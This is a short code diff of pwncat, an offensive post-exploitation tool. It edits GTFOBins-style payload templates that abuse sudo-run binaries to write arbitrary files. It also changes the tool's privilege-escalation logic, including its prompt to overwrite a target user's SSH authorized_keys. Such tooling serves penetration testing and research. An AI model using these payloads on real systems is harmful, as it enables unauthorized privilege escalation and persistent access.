diff --git a/data/gtfobins.json b/data/gtfobins.json
index 99c7c05..b2693c7 100644
--- a/data/gtfobins.json
+++ b/data/gtfobins.json
@@ -55,14 +55,20 @@
 		{
 			"type": "write",
 			"stream": "print",
-			"payload": "TF=$({mktemp}); {cat} - > $TF; {command}; rm -f $TF",
+			// This is weird because under the case where we are running w/ sudo,
+			// we need to ask for the password first. The first "{command}" will
+			// ask for the sudo password, then fail to copy. The second "{command}"
+			// will not ask for the sudo password, and then the copy will succeed.
+			// Without sudo, the first command will simply fail, and the second
+			// will succeed. This is the same for the other `cp` payload below.
+			"payload": "TF=none; {command}; TF=$({mktemp}); {chmod} ugo+r $TF; {cat} > $TF; {command}; rm -f $TF",
 			"args": ["$TF", "{lfile}"],
 			"exit": "{ctrl_d}"
 		},
 		{
 			"type": "write",
 			"stream": "base64",
-			"payload": "TF=$({mktemp}); {base64} -d > $TF; {command}; rm -f $TF",
+			"payload": "TF=none; {command}; TF=$({mktemp}); {chmod} ugo+r $TF; {base64} -d > $TF; {command}; rm -f $TF",
 			"args": ["$TF", "{lfile}"],
 			"exit": "{ctrl_d}"
 		}
diff --git a/pwncat/privesc/__init__.py b/pwncat/privesc/__init__.py
index 22a28a2..9a811e6 100644
--- a/pwncat/privesc/__init__.py
+++ b/pwncat/privesc/__init__.py
@@ -22,7 +22,7 @@ from pwncat import util
 # privesc_methods = [SetuidMethod, SuMethod]
 # privesc_methods = [SuMethod, SudoMethod, SetuidMethod, DirtycowMethod, ScreenMethod]
 # privesc_methods = [SuMethod, SudoMethod, ScreenMethod, SetuidMethod]
-privesc_methods = [SuMethod, SudoMethod, SetuidMethod]
+privesc_methods = [SuMethod, SudoMethod]
 
 
 class Finder:
@@ -160,7 +160,7 @@ class Finder:
                 for tech in found_techniques:
                     if (
                         tech.user == target_user
-                        and Capability.READ in tech.capabilities
+                        and Capability.WRITE in tech.capabilities
                     ):
                         try:
                             tech.method.write_file(filename, data, tech)
@@ -512,9 +512,9 @@ class Finder:
                 )
                 util.warn(f"however, we do have a writer.")
                 response = confirm(
-                    "would you like to clobber their authorized keys?", suffix="(y/N)"
+                    "would you like to clobber their authorized keys? ", suffix="(y/N) "
                 )
-                if response.lower() != "y":
+                if not response:
                     raise PrivescError("user aborted key clobbering")
 
         # If we don't already know a private key, then we need a writer